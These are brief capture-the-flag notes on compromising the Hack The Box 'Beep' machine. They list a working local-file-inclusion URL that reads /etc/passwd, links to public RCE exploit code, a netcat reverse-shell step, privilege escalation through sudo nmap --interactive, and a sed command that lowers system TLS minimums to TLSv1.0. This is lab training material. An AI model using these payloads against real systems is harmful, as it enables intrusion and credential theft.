URL : https://app.hackthebox.eu/machines/Beep
IP : 10.129.1.226
Recon
- 80 port is a login pageElastix
Find Payload
LFI
- Elastix 2.2.0 - ‘graph.php’ Local File Inclusionhttps://www.exploit-db.com/exploits/37637Try LFI- https://10.129.1.226/vtigercrm/graph.php?current_language=../../../../../../../etc/passwd%00&module=Accounts&action
With python request script, it will throw a exception, because the ssl version is toooo ol.- https://stackoverflow.com/questions/32330919/python-ssl-ssl-sslerror-ssl-unsupported-protocol-unsupported-protocol-ssl- Use this command to change the min version of TLS
sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf 
RCE
- Find RCE Codehttps://github.com/infosecjunky/FreePBX-2.10.0—Elastix-2.2.0—Remote-Code-Execution/blob/master/exploit.pyTurn nc to receive reverse shell-
Privilege Escalation
sudo -lcheck , we can sudonmap
sudo nmap --interactive